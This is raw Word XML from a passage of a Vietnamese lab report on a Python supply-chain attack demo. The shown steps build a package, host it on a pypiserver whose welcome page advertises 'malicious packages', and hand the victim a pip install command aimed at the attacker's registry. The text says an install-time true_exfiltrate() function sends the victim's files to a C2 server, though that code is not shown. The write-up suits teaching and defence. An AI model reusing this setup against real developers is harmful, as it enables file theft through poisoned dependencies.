    <w:p w14:paraId="04A751A6" w14:textId="77777777" w:rsidR="002D1355" w:rsidRDefault="002D1355" w:rsidP="002D1355">
      <w:r>
        <w:t>Kết quả đầy đủ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680F3CA2" w14:textId="065F6B32"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sidRPr="00A93806">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>myenv) quanart@quanart-VMware-Virtual-Platform:~/s04-package-poc$ python3 -m build --sdist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B95F42F"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 Creating isolated environment: venv+pip...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C5870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 Installing packages in isolated environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA6DE9"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 xml:space="preserve">  - setuptools &gt;= 40.8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB77755"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 Getting build dependencies for sdist...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2569E31A"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running egg_info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3A3396"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creating safe_demo_pkg.egg-info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D9E4D9"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safe_demo_pkg.egg-info/PKG-INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232D2D21"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dependency_links to safe_demo_pkg.egg-info/dependency_links.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17290BB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top-level names to safe_demo_pkg.egg-info/top_level.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3B604"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manifest file 'safe_demo_pkg.egg-info/SOURCES.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355A69F5"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reading manifest file 'safe_demo_pkg.egg-info/SOURCES.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F9FD0"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manifest file 'safe_demo_pkg.egg-info/SOURCES.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC2D729"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 Building sdist...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C52F9D"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running sdist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC06D34"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running egg_info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A558F"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safe_demo_pkg.egg-info/PKG-INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E21177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dependency_links to safe_demo_pkg.egg-info/dependency_links.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668E9CED"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top-level names to safe_demo_pkg.egg-info/top_level.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082728BC"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reading manifest file 'safe_demo_pkg.egg-info/SOURCES.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615278B4"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manifest file 'safe_demo_pkg.egg-info/SOURCES.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ED8B60"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running check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B08B0A0"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creating safe_demo_pkg-1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576CC04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creating safe_demo_pkg-1.2/safe_demo_pkg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0219D2BE"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creating safe_demo_pkg-1.2/safe_demo_pkg.egg-info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6802A"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files to safe_demo_pkg-1.2...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5FAD7D"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README.md -&gt; safe_demo_pkg-1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208F8A46"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setup.py -&gt; safe_demo_pkg-1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB86EA1"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safe_demo_pkg/__init__.py -&gt; safe_demo_pkg-1.2/safe_demo_pkg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6778F01A"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safe_demo_pkg/marker.py -&gt; safe_demo_pkg-1.2/safe_demo_pkg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259FF894"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safe_demo_pkg.egg-info/PKG-INFO -&gt; safe_demo_pkg-1.2/safe_demo_pkg.egg-info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05100529"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safe_demo_pkg.egg-info/SOURCES.txt -&gt; safe_demo_pkg-1.2/safe_demo_pkg.egg-info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A29CA2"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safe_demo_pkg.egg-info/dependency_links.txt -&gt; safe_demo_pkg-1.2/safe_demo_pkg.egg-info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435FC92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safe_demo_pkg.egg-info/top_level.txt -&gt; safe_demo_pkg-1.2/safe_demo_pkg.egg-info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB55A0D"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copying safe_demo_pkg.egg-info/SOURCES.txt -&gt; safe_demo_pkg-1.2/safe_demo_pkg.egg-info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C7FFC"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Writing safe_demo_pkg-1.2/setup.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D6C986"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lastRenderedPageBreak/>
        <w:t>Creating tar archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFE17DB" w14:textId="77777777" w:rsidR="00A93806" w:rsidRPr="00A93806"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removing 'safe_demo_pkg-1.2' (and everything under it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038FFD68" w14:textId="5DE62844" w:rsidR="00A93806" w:rsidRPr="002D1355" w:rsidRDefault="00A93806" w:rsidP="00A93806">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A93806">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Successfully built safe_demo_pkg-1.2.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E061268" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Quá trình build tạo ra đầy đủ metadata: PKG-INFO, SOURCES.txt, dependency_links.txt, top_level.txt — không có dấu hiệu bất thường về mặt cấu trúc file so với một package hợp pháp bất kỳ. Đây chính là điểm mấu chốt của supply chain attack: artifact trông hoàn toàn bình thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FCDB94" w14:textId="7C970C8D" w:rsidR="004D4D10" w:rsidRDefault="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="007A5661">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49C9800C" wp14:editId="2C9F4798">
            <wp:extent cx="5960110" cy="1564640"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="36012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4727" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="1564640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14806E4C" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc227470571"/>
      <w:r>
        <w:t>A.7 — Phát hành (Publish) package qua pypiserver</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="1E140F8F" w14:textId="194593A9" w:rsidR="004D4D10" w:rsidRDefault="00280D10">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Nhóm cài pypiserver — một private PyPI registry đầy đủ chức năng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A5B266"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5872B1D6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920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40" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="29B9B78A" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Tại sao phải dùng pypiserver thay vì http.server?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C303B9" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t>http.server chỉ là file server tĩnh — pip không thể resolve package theo tên từ server này. Victim phải gõ URL đầy đủ (pip install http://..../file.tar.gz) — không mô phỏng được supply chain thật. pypiserver triển khai đúng chuẩn PEP 503 Simple Repository API, cho phép victim gõ pip install safe-demo-pkg --index-url http://... — đây mới là cách consumption thực sự hoạt động, giống hệt cách attacker compromise một private registry nội bộ (Nexus, Artifactory, Verdaccio).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="431D5295" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F5F0EC" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>source ~/myenv/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342882EC" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pip install pypiserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113374E0" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458E10D1" w14:textId="5E6A075B" w:rsidR="004D4D10" w:rsidRDefault="002D1355" w:rsidP="002D1355">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3564"/>
        </w:tabs>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002B7CF2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24A91277" wp14:editId="72442C61">
            <wp:extent cx="5960110" cy="1821180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="170410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01426" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="1821180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7627F7DE" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>File welcome.html hiển thị lệnh pip install chuẩn với --index-url và --trusted-host để victim copy-paste chính xác, phản ánh đúng kịch bản developer tin tưởng registry nội bộ của tổ chức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B8CC43"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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680E0DC"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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293F2C71"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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7798C0B1"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&lt;title&gt;Welcome to S04 PyPI Server!&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2537BE"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&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D84E2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body { font-family: sans-serif; margin: 40px; line-height: 1.6; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B6871"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        code { background-color: #f4f4f4; padding: 2px 5px; border-radius: 4px; font-family: monospace; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13227FF6"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.command { background-color: #f4f4f4; padding: 15px; border-left: 4px solid #007acc; font-family: monospace; margin: 10px 0; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D93A9BB"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&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E3289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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999623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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5A3372"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&lt;h1&gt;Welcome to S04 Private PyPI Server!&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B74773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&lt;p&gt;This is a custom PyPI compatible package index serving malicious packages for the S04 Supply Chain Demo.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0ECB9A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A5C390"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&lt;h3&gt;To use this server with pip, run the following command:&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4C4574"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&lt;div class="command"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B113A52"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pip install PACKAGE_NAME --index-url http://192.168.157.134:8000/simple/ --trusted-host 192.168.157.134</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF74B0E"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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50074E3F"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p>
    <w:p w14:paraId="4351B1E2"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&lt;p&gt;The complete list of all packages can be found &lt;a href="/packages/"&gt;here&lt;/a&gt; &lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302213A1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2657C9E0"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 xml:space="preserve">    &lt;p&gt;This instance is running version 2.4.1 of the &lt;a href="https://github.com/pypiserver/pypiserver"&gt;pypiserver&lt;/a&gt; software.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E86DAB" w14:textId="77777777" w:rsidR="002D1355" w:rsidRPr="002C0DDF" w:rsidRDefault="002D1355" w:rsidP="002D1355">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C0DDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4040D" w14:textId="77777777" w:rsidR="002D1355" w:rsidRDefault="002D1355" w:rsidP="002D1355">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r w:rsidRPr="002C0DDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CE699" w14:textId="0B9D1C95" w:rsidR="004D4D10" w:rsidRDefault="002D1355" w:rsidP="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002C0DDF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="255E3242" wp14:editId="2037D742">
            <wp:extent cx="5960110" cy="2527935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="110481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18241" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="2527935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61564DF8" w14:textId="77777777" w:rsidR="00280D10" w:rsidRDefault="00280D10" w:rsidP="00280D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Khởi động registry với giao diện tùy chỉnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FA1489" w14:textId="77777777" w:rsidR="00280D10" w:rsidRDefault="00280D10" w:rsidP="00280D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cd ~/s04-package-poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F2A5C3" w14:textId="77777777" w:rsidR="00280D10" w:rsidRDefault="00280D10" w:rsidP="00280D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pypi-server run -p 8000 ./dist --welcome welcome.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F04AC64" w14:textId="6635E17E" w:rsidR="00280D10" w:rsidRDefault="00280D10" w:rsidP="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00280D10">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C189C0E" wp14:editId="153E891A">
            <wp:extent cx="5960110" cy="796925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="6780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3829" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="796925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65076B99" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc227470572"/>
      <w:r>
        <w:t>A.8 — Victim truy cập registry và xem artifact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="68B7BBB3" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Từ máy Windows, victim mở trình duyệt truy cập http://192.168.157.134:8000. Trang welcome.html do nhóm tùy chỉnh hiển thị, cho thấy registry đang chạy đúng chuẩn PyPI và cung cấp lệnh pip install để victim dùng. Đây là bằng chứng pypiserver đã hoạt động thành công — không còn là raw directory listing của http.server nữa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA8AA2D" w14:textId="7E1E4C2D" w:rsidR="004D4D10" w:rsidRDefault="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00C22286">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B5D5D52" wp14:editId="36F280EE">
            <wp:extent cx="5960110" cy="3475990"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2323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8704" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="3475990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40956C9F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc227470573"/>
      <w:r>
        <w:t>A.9 — Victim tạo file nhử (decoy data) trước khi cài package</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="3F74D55F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Trước khi thực hiện cài đặt, nhóm tạo sẵn một số file .txt trong C:\Users\Hong Quan\Documents làm dữ liệu nhử. Đây là bước thiết lập baseline rõ ràng: ghi lại trạng thái hệ thống trước khi pip install để có thể so sánh sau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A6D8A" w14:textId="4924E51D" w:rsidR="004D4D10" w:rsidRDefault="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00C22286">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="277666D3" wp14:editId="222D3C6A">
            <wp:extent cx="5960110" cy="1522095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="30583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4274" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="1522095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B8FA4E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ý nghĩa thực nghiệm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316784DD" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Xác nhận trạng thái TRƯỚC: Documents có file .txt, C2 server chưa nhận gì</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F9B996" w14:textId="7D93E7A5" w:rsidR="004D4D10" w:rsidRDefault="00000000" w:rsidP="002D1355">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi pip install: nếu C2 server nhận được nội dung file → chứng minh true_exfiltrate() đã chạy và gửi dữ liệu thật qua mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6851A2CE" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc227470574"/>
      <w:r>
        <w:t>A.10 — Victim cài đặt package từ pypiserver nội bộ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="1EDFA795" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Đây là bước trung tâm của toàn bộ PoC. Victim gõ lệnh pip install theo tên package với --index-url trỏ về pypiserver nội bộ — đây mới là đúng mô hình supply chain consumption: victim không biết gì về payload bên trong, chỉ đang cài một dependency như bình thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052CC471" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2178D734" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
